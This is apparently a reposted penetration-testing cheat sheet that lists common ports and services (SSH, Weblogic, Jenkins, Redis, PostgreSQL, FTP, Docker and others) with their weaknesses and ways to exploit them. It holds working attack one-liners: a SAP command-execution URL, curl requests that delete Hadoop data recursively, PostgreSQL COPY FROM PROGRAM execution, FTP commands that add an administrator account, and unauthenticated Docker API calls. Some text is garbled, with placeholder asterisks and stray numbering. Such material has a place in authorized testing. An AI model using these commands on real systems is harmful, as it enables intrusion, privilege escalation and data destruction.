web123456

Common port penetration records

Common port penetration records

  • I didn't write this, I saw it in my circle of friends and felt it was pretty good, so I quickly recorded it
  • We don't do penetration, we're just penetration handlers
  • When facing a target host, we often use port scanning to understand the open ports and services of the target host. When you see a port number, have you guessed what service it is, and what security vulnerabilities and exploitation postures it may have?
  • Today I share some common port services and vulnerabilities to help you quickly find attack paths to obtain host permissions

1. Remote management port

22 port (SSH)

Security attacks: weak passwords, brute force guesses, username enumeration
 Utilization method: 1. You can determine whether a username exists in the target host through username enumeration. 2. Use weak passwords/brute force to obtain the target host permissions.
  • 1
  • 2

Port 23 (Telnet)

Security vulnerabilities: weak passwords, plain text transmission
 Utilization method: 1. Obtain the target host permissions through weak passwords or brute force cracking.  2. Sniff and grab the telnet plaintext account password.
  • 1
  • 2

3389 Port (RDP)

Security vulnerabilities: Brute force cracking
 Utilization method: Obtain target host permissions through weak passwords or brute force cracking.
  • 1
  • 2

5632 port (Pcanywhere)

Security vulnerabilities: weak passwords, brute force cracking
 Utilization method: Obtain target host permissions through weak passwords or brute force cracking
  • 1
  • 2

5900 Port (VNC)

Security vulnerabilities: weak passwords, brute force cracking
 Utilization method: Obtain target host permissions through weak passwords or brute force cracking.
  • 1
  • 2

2. Web middleware/service port

1090/1099 Port (RMI)

Security vulnerability: JAVA RMI deserialization remote command execution vulnerability
 Utilization method: Use nmap to detect port information
 Port information: 1099/1090 Java-rmi Java RMI Registry
 Detection tool:
  • 1
  • 2
  • 3
  • 4

7001 port (Weblogic)

Security vulnerabilities: Weak password, SSRF, deserialization vulnerabilities
 Utilization methods: 1. Upload the war * on the console with weak passwords 2. SSRF intranet detection 3. Deserialization of remote code execution, etc.
  • 1
  • 2

8000 port (jdwp)

Security vulnerability: JDWP remote command execution vulnerability
 Port information: 8000 jdwp java Debug Wire Protocol
 Detection tool: /IOActive/jdwp-shellifier
  • 1
  • 2
  • 3

Port 8080 (Tomcat

Security vulnerabilities: Weak passwords, sample directories
 Utilization method: Log in to the console through weak password and upload the war package.
  • 1
  • 2

8080 port (Jboss)

Security vulnerability: Unauthorized access, deserialization
 Utilization methods: 1. Unauthorized access to the console, remote deployment of *s 2. Deserialization leads to remote command execution, etc.
 Detection tool: /joaomatosf/jexboss
  • 1
  • 2
  • 3

8080 port (Resin)

Security vulnerability: Remote shared buffer leak
 Utilization method: The attacker can trigger an exception and offset it to the shared buffer by carefully constructing the headers value, which contains requests submitted by other users before. The server will return data at a specific location based on the attacker's payload.
 Testing tools: /GDSSecurity/Jetleak-Testing-Script
  • 1
  • 2
  • 3

8080 port (GlassFish)

Security vulnerability: weak password, arbitrary file reading
 Utilization method: 1. Weak password admin/admin, directly deploy shell2, read any file to obtain server sensitive configuration information
  • 1
  • 2

8080 port (Jenkins)

Security vulnerability: Unauthorized access, remote code execution
 Utilization method: access the following url, you can execute script commands, rebound shell, write webshell, etc.
 http://<target>:8080/manage
 http://<target>:8080/script
  • 1
  • 2
  • 3
  • 4

8161 port (ActiveMQ)

Security vulnerabilities: weak passwords, arbitrary file writing, deserialization
 Utilization method: default password admin/admin login to the console, write webshell, upload ssh key, etc.
  • 1
  • 2

9043 port (webSphere)

Security vulnerability: Console weak password, remote code execution
 Backend address: https://:9043/ibm/console/
  • 1
  • 2

50000 Port (SAP)

Security vulnerability: Remote code execution
 Utilization method: The attacker constructs url requests to realize remote code execution
 POC:http://<target>:50000/ctc/servlet/?param=;EXECUTE_CMD;CMDLINE= /c ipconfig /all
  • 1
  • 2
  • 3

50070 port (hadoop

Security vulnerability: Unauthorized access
 Utilization method: Attackers can operate data in multiple directories through the command line, such as deletion operations
 curl -i -X ​​DELETE "http://ip:50070/webhdfs/v1/tmp?op=DELETE&recursive=true" curl -i -X ​​PUT "http://ip:50070/webhdfs/v1/NODATA4U_SECUREYOURSHIT?op=MKDIRS"
  • 1
  • 2
  • 3

3. Database port

389 port (ldap)

Security vulnerability: Unauthorized access, weak password
 Usage method: Directly connect through the LdapBrowser tool
  • 1
  • 2

1433 port (Mssql)

Security vulnerabilities: weak passwords, brute force cracking
 Utilization method: differential backup getshell, SA account withdrawal, etc.
  • 1
  • 2

Port 1521 (Oracle

Security vulnerabilities: weak passwords, brute force cracking
 Utilization method: invade through weak password/brute force cracking
  • 1
  • 2

3306 port (MySQL

Security vulnerabilities: weak passwords, brute force cracking
 Utilization method: use logs to write webshell, udf power escalation, mof power escalation, etc.
  • 1
  • 2

5432 port (PostgreSQL)

Security vulnerabilities: weak passwords, high-permission command execution
 Utilization method: The attacker obtains account information through weak passwords, connects it to postgres, and can execute system commands
 PoC reference: DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;
  • 1
  • 2
  • 3

5984 port (CouchDB)

Security vulnerability: Vertical permission bypass, arbitrary command execution
 Utilization method: Create an administrator user by constructing data, log in with the administrator user, and create a malicious request to trigger any command execution
 Backend access: http://<target>:5984/_utils
  • 1
  • 2
  • 3

6379 port (Redis

Security vulnerability: Unauthorized access
 Utilization method: write webshell by absolute path, use scheduled task execution command to rebound shell, public-private key authentication to obtain root permissions, master-slave copy RCE, etc.
  • 1
  • 2

9200 port (elasticsearch)

Security vulnerability: Unauthorized access, command execution
 Test method:
 1. Directly access the following url to obtain relevant sensitive information: http://<target>:9200/_nodes View node data http://<target>:9200/_river View database sensitive information
 2. By constructing a specific data packet, execute any command
  • 1
  • 2
  • 3
  • 4

11211 Port (MemCache)

Security vulnerability: Unauthorized access
 Detection method: No username and password are required, you can directly connect to the 11211 port of the memcache service.  nc -vv <target> 11211
 27017 port (Mongodb)

 Security vulnerability: Unauthorized access, weak password
 Utilization method: Unauthorized access/weak password, remote connection to the database, resulting in leakage of sensitive information
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

4. Common protocol ports

21 port (FTP)

Security vulnerabilities: 1. Improper configuration 2. Clear text transmission 3. Third-party software upgrade
 How to use:
 1. Anonymous login or weak password
 2. Sniff the ftp username and password
 3. Accounts with larger Serv-U permissions can lead to system command execution.  FTP privilege escalation command: Increase system users
    Quote site exec net user 4567 4567 /add
 Improved to administrator permissions
    Quote site exec net localgroup administrators 4567 /ad
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8

25 port (SMTP)

Attack method: 1. Send email anonymously 2. Weak password 3. SMTP user enumeration
 How to use:
 1. The SMTP server is not configured properly, and an attacker can use any user to send emails.
 2. Scan the SMTP weak password, obtain the user account password, and send emails to phish
 3. Obtain user name through SMTP user enumeration: nmap -p 25 -- <target>
  • 1
  • 2
  • 3
  • 4
  • 5

Port 53 (DNS)

Security attacks: 1. DNS domain transmission vulnerability, DNS spoofing, DNS cache poisoning
 Test method:
 1. DNS domain transmission vulnerability. The nslookup command is detected under Windows and the dig command is detected under Linux. The domain name resolution can be clearly seen by executing the command.
 2. DNS spoofing is a spoofing behavior of an attacker impersonating a domain name server.
 3. DNS cache poisoning is an attacker who deceives DNS servers to believe in the authenticity of fake DNS responses.
  • 1
  • 2
  • 3
  • 4
  • 5

161 port (SNMP)

Security vulnerability: Default group name/weak password access
 Utilization method: Detection through the audit scripts that come with nmap may lead to leakage of sensitive information
 1. Weak password detection: nmap –sU –p161 –script=snmp-brute <target>
 2. Obtain system information: nmap –sU –p161 –script=snmp-sysdescr <target>
 3. Obtain user information: nmap -sU -p161 --script=snmp-win32-user <target>
 4. Get the network port status: nmap -sU -p161 --script=snmp-netstat <target>
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

443 port (SSL)

Security Breakdown: OpenSSL Heart Bleeding
 Utilization method: Attackers can remotely read 64K data grown in the memory of the vulnerable version of the openssl server
 Scan script: nmap -sV --script=ssl-heartbleed <target>
  • 1
  • 2
  • 3

445 port (SMB)

Security vulnerabilities: information leakage, remote code execution
 Utilization method: You can use sharing to obtain sensitive information, buffer overflow causes remote code execution, such as ms17010
  • 1
  • 2

Port 873 (Rsync)

Security vulnerabilities: anonymous access, weak passwords
 Utilization method: Attackers can perform download/upload and other operations, or try to upload webshell
 1. Download: #rsync -avz ::path/file path/filiname
 2. Upload: #rsync -avz path/filename ::path/file
  • 1
  • 2
  • 3
  • 4

2181 port (Zookeeper)

Security vulnerability: Unauthorized access
 Detection method: Attackers can obtain a large amount of sensitive information from the system by executing envi commands, including system name and Java environment
 echo envi | nc ip port
  • 1
  • 2
  • 3

Port 2375 (Docker

Security vulnerability: Unauthorized method
 Detection method: Execute docker command through docker daemon api
 #List container information, the effect is consistent with docker ps -a
  curl http://<target>:2375/containers/json
  docker -H tcp://<target>:2375 start <Container Id>
  • 1
  • 2
  • 3
  • 4
  • 5